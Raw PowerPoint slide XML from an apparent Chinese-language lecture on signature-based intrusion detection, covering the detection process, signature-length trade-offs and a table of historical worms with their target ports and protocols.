                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23A5EDFD-7E57-1D3D-3F5F-42E1E5CCD669}"/>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a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84D10C28-90F1-C4A4-4E9D-2D8FE0A3F754}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3845096"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68" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51D05DB7-C094-BDB2-6669-CA7E1B8C5FD9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3860800" y="3293024"/>
              <a:ext cx="1109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检测过程</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Freeform 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95C4D573-C220-8A97-DFBD-45747B25227A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4145506" y="3865153"/>
            <a:ext cx="6269241" cy="1921601"/>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ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" algn="l" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="825">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{777C130B-E676-3F2D-790C-ACC96773803C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4954833" y="3840158"/>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监控</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D107D57A-919E-FFEC-8A8E-DF138C5CAB1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5660804" y="5266400"/>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提取特征</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C3D3730-B30B-01A0-8A0B-DEFE6F037E41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8047187" y="5246906"/>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匹配</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B588B4D5-F848-1578-10F1-F22B2AD729D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9005494" y="3993710"/>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zh-CN" altLang="en-US" sz="2100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>判定</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EBAF145-8310-471A-83BB-24FED1B3D9DE}"/>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67923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strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>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fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="70"/>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误用检测的特点</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="43" name="组合 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD177DF3-21B0-FC7B-614C-E8C43250A66F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="2021115"/>
            <a:ext cx="4454525" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="7015"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578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误报率低、漏报率高</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRP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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89B673CD-FE79-4645-5C86-F671C5DE4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75" y="3939118"/>
            <a:ext cx="3040631" cy="2028671"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:softEdge rad="317500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="40" name="组合 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7E81D97-EBA3-C19E-815F-ED3CBF66B9FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="3060000"/>
            <a:ext cx="2958353" cy="720000"/>
            <a:chOff x="3792538" y="3152454"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B59921CB-7B1D-5F84-8FD4-A9473B7A7554}"/>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8" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82000A4E-4572-1F45-1241-78C38FADBE73}"/>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1" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A53287B9-5D51-46EB-5131-443F26606BC0}"/>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攻击特征</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52" name="组合 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04925955-F6E3-BEBF-E93A-F48489996956}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="3939118"/>
            <a:ext cx="4454525" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="7015" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3964DC74-B8FE-5574-38C5-E0579B2094C2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1949"/>
              <a:ext cx="578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误用检测的核心</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="55" name="组合 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{655E202E-7D59-DE68-093B-ED3313F4B578}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="62" name="图片 61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD288828-1971-9ED9-2F16-971BFBBA31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8" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41CD8A2D-2C49-9DFA-CBFF-9292A78487F4}"/>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9" name="组合 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF792BAB-275F-0550-2866-8E013942BE20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1089940" y="4997023"/>
            <a:ext cx="6570345" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="10347" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1F6C72E-01E7-4365-6948-153E83165B9B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1949"/>
              <a:ext cx="911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noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>过长的攻击特征降低系统效率</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="71" name="组合 70">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{542898C4-9161-5179-E778-9D5C4415866A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="72" name="图片 71">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45FB4373-1E9F-920B-DF0B-5AC3E3154C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73" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7CC91B5-1FCC-C095-5DAF-891763BE0302}"/>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74" name="组合 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AB14C60-D6F7-5AE2-DE33-EB1974E059D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1089940" y="4460564"/>
            <a:ext cx="6091555" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="9593" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA983B4F-F73E-FCD0-1EC7-2CAACEED758D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1949"/>
              <a:ext cx="836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太短的攻击特征会导致误报</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="78" name="组合 77">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD535713-4099-8E62-C786-57C129DF70A5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="79" name="图片 78">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF5AAF67-EC8D-2B0E-868C-421D8E60CD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80" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E315583-5DA5-4092-64A2-B2633ECAA15A}"/>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 name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22C96D55-DAF3-4398-B4B6-FB467DD903F3}"/>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364420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9B673CD-FE79-4645-5C86-F671C5DE4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275" y="3939118"/>
            <a:ext cx="3040631" cy="2028671"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:softEdge rad="317500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="表格 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3740155233"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1318512" y="2260227"/>
          <a:ext cx="9554975" cy="1852406"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="101600" dir="2700000" algn="tl" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="40000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1574695">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4004488056"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1791221">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4127112920"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1929009">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2878001425"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2141950">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3841408498"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2118100">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3362822233"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="591412">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
                        <a:t>红色代码</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
                        <a:t>CodeRedWbrm</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
                        <a:t>硬盘杀手</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
                        <a:t>Worm.opasoft</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
                        <a:t>蠕虫王</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
                        <a:t>Worm.SQLexp.376</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
                        <a:t>冲击波</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
                        <a:t>Wrom.Blaster</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="556973190"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="357330">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
                        <a:t>目标端口</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
                        <a:t>80</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
                        <a:t>137</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
                        <a:t>1434</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
                        <a:t>135</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4127167494"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370356">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
                        <a:t>协议类型</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
                        <a:t>IP</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
